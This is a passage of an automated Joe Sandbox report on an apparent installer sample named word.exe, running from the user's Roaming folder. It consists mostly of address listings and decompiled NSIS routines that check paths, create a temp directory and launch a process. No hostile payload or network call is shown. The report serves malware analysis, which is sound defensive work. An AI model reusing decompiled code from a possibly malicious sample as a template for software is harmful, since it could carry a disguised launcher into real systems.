                                                          0x00406018
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040605d
                                                          0x00406063
                                                          0x00406066
                                                          0x00406073
                                                          0x0040607b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406032
                                                          0x00406032
                                                          0x00406036
                                                          0x00406881
                                                          0x00000000
                                                          0x00406881
                                                          0x00406042
                                                          0x0040604d
                                                          0x0040604d
                                                          0x0040604d
                                                          0x00406050
                                                          0x00406053
                                                          0x00406056
                                                          0x00406059
                                                          0x0040605b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f8
                                                          0x004066fe
                                                          0x00406701
                                                          0x00406704
                                                          0x0040671e
                                                          0x00406721
                                                          0x00406727
                                                          0x00406732
                                                          0x00406732
                                                          0x00406734
                                                          0x00406706
                                                          0x00406706
                                                          0x00406715
                                                          0x00406719
                                                          0x00406719
                                                          0x00406737
                                                          0x0040673e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406740
                                                          0x00406740
                                                          0x00406744
                                                          0x004068f3
                                                          0x00000000
                                                          0x004068f3
                                                          0x00406750
                                                          0x00406757
                                                          0x0040675f
                                                          0x0040675f
                                                          0x0040675f
                                                          0x00406762
                                                          0x00406765
                                                          0x00406765
                                                          0x00000000
                                                          0x00000000
                                                          0x00406083
                                                          0x00406085
                                                          0x00406088
                                                          0x004060f9
                                                          0x004060fc
                                                          0x004060ff
                                                          0x00406106
                                                          0x00406110
                                                          0x00000000
                                                          0x00406110
                                                          0x0040608a
                                                          0x0040608e
                                                          0x00406091
                                                          0x00406093
                                                          0x00406096
                                                          0x00406099
                                                          0x0040609b
                                                          0x0040609e
                                                          0x004060a0
                                                          0x004060a5
                                                          0x004060a8
                                                          0x004060ab
                                                          0x004060af
                                                          0x004060b6
                                                          0x004060b9
                                                          0x004060c0
                                                          0x004060c4
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060d0
                                                          0x004060d3
                                                          0x004060f1
                                                          0x004060f3
                                                          0x00000000
                                                          0x004060f3
                                                          0x004060d5
                                                          0x004060d8
                                                          0x004060db
                                                          0x004060de
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e3
                                                          0x004060e6
                                                          0x004060e8
                                                          0x004060e9
                                                          0x004060ec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406322
                                                          0x00406326
                                                          0x00406344
                                                          0x00406347
                                                          0x0040634e
                                                          0x00406351
                                                          0x00406354
                                                          0x00406357
                                                          0x0040635a
                                                          0x0040635d
                                                          0x0040635f
                                                          0x00406366
                                                          0x00406367
                                                          0x00406369
                                                          0x0040636c
                                                          0x0040636f
                                                          0x00406372
                                                          0x00406372
                                                          0x00406377
                                                          0x00000000
                                                          0x00406377
                                                          0x00406328
                                                          0x0040632b
                                                          0x0040632e
                                                          0x00406338
                                                          0x00000000
                                                          0x00000000
                                                          0x0040638c
                                                          0x00406390
                                                          0x004063b3
                                                          0x004063b6
                                                          0x004063b9
                                                          0x004063c3
                                                          0x00406392
                                                          0x00406392
                                                          0x00406395
                                                          0x00406398
                                                          0x0040639b
                                                          0x004063a8
                                                          0x004063ab
                                                          0x004063ab
                                                          0x00000000
                                                          0x00000000
                                                          0x004063cf
                                                          0x004063d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004063d9
                                                          0x004063dd
                                                          0x00000000
                                                          0x00000000
                                                          0x004063e3
                                                          0x004063e5
                                                          0x004063e9
                                                          0x004063e9
                                                          0x004063ec
                                                          0x004063f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406440
                                                          0x00406444
                                                          0x0040644b
                                                          0x0040644e
                                                          0x00406451
                                                          0x0040645b
                                                          0x00000000
                                                          0x0040645b
                                                          0x00406446
                                                          0x00000000
                                                          0x00000000
                                                          0x00406467
                                                          0x0040646b
                                                          0x00406472
                                                          0x00406475
                                                          0x00406478
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040647b
                                                          0x0040647e
                                                          0x00406481
                                                          0x00406481
                                                          0x00406484
                                                          0x00406487
                                                          0x0040648a
                                                          0x0040648a
                                                          0x0040648d
                                                          0x00406494
                                                          0x00406499
                                                          0x00000000
                                                          0x00000000
                                                          0x00406527
                                                          0x00406527
                                                          0x0040652b
                                                          0x004068c9
                                                          0x00000000
                                                          0x004068c9
                                                          0x00406531
                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040611c
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x00000000
                                                          0x0040688d
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00406141
                                                          0x00406141
                                                          0x00406144
                                                          0x00406147
                                                          0x00000000
                                                          0x00000000
                                                          0x0040614d
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00406159
                                                          0x00406159
                                                          0x0040615d
                                                          0x00406160
                                                          0x00406163
                                                          0x00406166
                                                          0x00406169
                                                          0x0040616a
                                                          0x0040616d
                                                          0x0040616f
                                                          0x00406175
                                                          0x00406178
                                                          0x0040617b
                                                          0x0040617e
                                                          0x00406181
                                                          0x00406184
                                                          0x00406187
                                                          0x004061a3
                                                          0x004061a6
                                                          0x004061a9
                                                          0x004061ac
                                                          0x004061b3
                                                          0x004061b7
                                                          0x004061b9
                                                          0x004061bd
                                                          0x00406189
                                                          0x00406189
                                                          0x0040618d
                                                          0x00406195
                                                          0x0040619a
                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x00000000
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x0040676b
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563
                                                          0x00406566
                                                          0x00406568
                                                          0x0040656b
                                                          0x0040656e
                                                          0x0040656e
                                                          0x00406571
                                                          0x00406571
                                                          0x00406574
                                                          0x0040657b
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x00000000
                                                          0x0040657d
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657b
                                                          0x00406501
                                                          0x00406504
                                                          0x00406506
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x00406268
                                                          0x00406268
                                                          0x0040626c
                                                          0x004068b1
                                                          0x00000000
                                                          0x004068b1
                                                          0x00406272
                                                          0x00406275
                                                          0x00406278
                                                          0x0040627b
                                                          0x0040627e
                                                          0x00406281
                                                          0x00406284
                                                          0x00406286
                                                          0x00406289
                                                          0x0040628c
                                                          0x0040628f
                                                          0x00406291
                                                          0x00406291
                                                          0x00406291
                                                          0x00000000
                                                          0x00000000
                                                          0x004063f3
                                                          0x004063f3
                                                          0x004063f7
                                                          0x004068bd
                                                          0x00000000
                                                          0x004068bd
                                                          0x004063fd
                                                          0x00406400
                                                          0x00406403
                                                          0x00406406
                                                          0x00406408
                                                          0x00406408
                                                          0x00406408
                                                          0x0040640b
                                                          0x0040640e
                                                          0x00406411
                                                          0x00406414
                                                          0x00406417
                                                          0x0040641a
                                                          0x0040641b
                                                          0x0040641d
                                                          0x0040641d
                                                          0x0040641d
                                                          0x00406420
                                                          0x00406423
                                                          0x00406426
                                                          0x00406429
                                                          0x00406429
                                                          0x00406429
                                                          0x0040642c
                                                          0x0040642e
                                                          0x0040642e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406670
                                                          0x00406670
                                                          0x00406670
                                                          0x00406674
                                                          0x00000000
                                                          0x00000000
                                                          0x0040667a
                                                          0x0040667d
                                                          0x00406680
                                                          0x00406683
                                                          0x00406685
                                                          0x00406685
                                                          0x00406685
                                                          0x00406688
                                                          0x0040668b
                                                          0x0040668e
                                                          0x00406691
                                                          0x00406694
                                                          0x00406697
                                                          0x00406698
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669d
                                                          0x004066a0
                                                          0x004066a3
                                                          0x004066a6
                                                          0x004066a9
                                                          0x004066ad
                                                          0x004066af
                                                          0x004066b2
                                                          0x00000000
                                                          0x004066b4
                                                          0x00406431
                                                          0x00406431
                                                          0x00000000
                                                          0x00406431
                                                          0x004066b2
                                                          0x004068e7
                                                          0x00406909
                                                          0x0040690f
                                                          0x00406911
                                                          0x00406918
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x0040691e
                                                          0x0040691e
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tCPInfo
                                                          • API String ID: 0-2120998202
                                                          • Opcode ID: b0886b8647590f49d196a4ae9d285ef76414e2f02c97ef520e18707fbbef2023
                                                          • Instruction ID: 41b63ac7315969e8c4cdeb39c952146f886d2b6e08649ca9387d619dcd40c967
                                                          • Opcode Fuzzy Hash: b0886b8647590f49d196a4ae9d285ef76414e2f02c97ef520e18707fbbef2023
                                                          • Instruction Fuzzy Hash: A8817871D04229CFDF24CFA8C8447AEBBB0FB44305F25816AD856BB281D7785A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004056C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 627 4056c8-4056e3 call 405af4 call 40567b 632 4056e5-4056e7 627->632 633 4056e9-4056f6 call 405d03 627->633 634 40573b-40573d 632->634 637 405702-405704 633->637 638 4056f8-4056fc 633->638 640 40571a-405723 lstrlenA 637->640 638->632 639 4056fe-405700 638->639 639->632 639->637 641 405725-405739 call 4055e7 GetFileAttributesA 640->641 642 405706-40570d call 405d9c 640->642 641->634 647 405714-405715 call 40562e 642->647 648 40570f-405712 642->648 647->640 648->632 648->647
                                                          C-Code - Quality: 53%
                                                          			E004056C8(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405AF4(0x421938, _a4);
				_t21 = E0040567B(0x421938);
				if(_t21 != 0) {
					E00405D03(_t21);
					if(( *0x423f30 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421938;
						while(1) {
							_t11 = lstrlenA(0x421938);
							_push(0x421938);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405D9C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040562E(0x421938);
								continue;
							} else {
								goto L1;
							}
						}
						E004055E7();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                          0x004056d4
                                                          0x004056df
                                                          0x004056e3
                                                          0x004056ea
                                                          0x004056f6
                                                          0x00405702
                                                          0x00405702
                                                          0x0040571a
                                                          0x0040571b
                                                          0x00405722
                                                          0x00405723
                                                          0x00000000
                                                          0x00000000
                                                          0x00405706
                                                          0x0040570d
                                                          0x00405715
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040570d
                                                          0x00405725
                                                          0x0040572b
                                                          0x00000000
                                                          0x00405739
                                                          0x004056f8
                                                          0x004056fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004056fc
                                                          0x004056e5
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,00423720,NSIS Error), ref: 00405B01
                                                            • Part of subcall function 0040567B: CharNextA.USER32(:T@), ref: 00405689
                                                            • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040568E
                                                            • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040569D
                                                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,C:\Users\user\AppData\Roaming\word.exe,755513E0,0040543A,?,755513E0,00000000), ref: 0040571B
                                                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,C:\Users\user\AppData\Roaming\word.exe,755513E0,0040543A,?,755513E0,00000000), ref: 0040572B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\$C:\Users\user\AppData\Roaming\word.exe
                                                          • API String ID: 3248276644-3352972398
                                                          • Opcode ID: d7a6fd6b08d9551768931ca80393006ad21f6be298864b6a11b3b7159a130088
                                                          • Instruction ID: c9a5ad2ab4ff501f0e3d3fb61e1c810f238de096eca0db9d00b0265de3cbf42b
                                                          • Opcode Fuzzy Hash: d7a6fd6b08d9551768931ca80393006ad21f6be298864b6a11b3b7159a130088
                                                          • Instruction Fuzzy Hash: 81F04C25116D5152C72233392C09AAF1755CE9632CB48093BF865B22E2DB3D8803ED7E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405361 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 650 405361-40538e CreateProcessA 651 405390-405399 CloseHandle 650->651 652 40539c-40539d 650->652 651->652
                                                          C-Code - Quality: 100%
                                                          			E00405361(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422538->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422538,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                          0x0040536a
                                                          0x00405386
                                                          0x0040538e
                                                          0x00405393
                                                          0x00000000
                                                          0x00405399
                                                          0x0040539d

                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422538,Error launching installer), ref: 00405386
                                                          • CloseHandle.KERNEL32(?), ref: 00405393
                                                          Strings
                                                          • Error launching installer, xrefs: 00405374
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405361
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                          • API String ID: 3712363035-3894416041
                                                          • Opcode ID: 95266c0028550c5be94e5f06544d2cc5b2c8f5817e632bf3c1e547dcfbef7da9
                                                          • Instruction ID: 4b3b5e29b82f538c1f6189d2f0b4571506454f650d891e3160212e6729b48b77
                                                          • Opcode Fuzzy Hash: 95266c0028550c5be94e5f06544d2cc5b2c8f5817e632bf3c1e547dcfbef7da9
                                                          • Instruction Fuzzy Hash: 9AE012B4A00209BFDB00EF64ED49E6FBBBCFB10344F808571B914F2151D7B8E9508A69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004032C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E004032C6(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
				E00405D03(_t6);
				_t2 = E00405654(_t6);
				if(_t2 != 0) {
					E004055E7(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004057FA("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                          0x004032c7
                                                          0x004032cd
                                                          0x004032d3
                                                          0x004032da
                                                          0x004032df
                                                          0x004032e7
                                                          0x004032f3
                                                          0x004032f9
                                                          0x004032dd
                                                          0x004032dd
                                                          0x004032dd

                                                          APIs
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D5B
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D68
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D6D
                                                            • Part of subcall function 00405D03: CharPrevA.USER32(?,?), ref: 00405D7D
                                                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004032E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 4115351271-1176120985
                                                          • Opcode ID: c49a4ae33f7a441e05ad4f45e3ad89d0cea47cd121eda0228c9a518e283b1627
                                                          • Instruction ID: d6c3561ce191540899b591fc5212b2685f70515619ba473533d6486adf82dab9
                                                          • Opcode Fuzzy Hash: c49a4ae33f7a441e05ad4f45e3ad89d0cea47cd121eda0228c9a518e283b1627
